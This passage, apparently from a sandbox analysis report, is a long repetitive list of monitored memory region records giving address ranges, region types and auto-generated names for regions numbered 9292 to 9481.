= 9292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9318 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9319 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9320 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9321 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9322 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9327 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9333 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9334 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9368 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9369 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9372 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9373 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9389 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9390 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9391 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9392 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9407 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9408 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9414 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9415 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9416 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9417 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9418 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9433 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9453 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9467 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9479 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 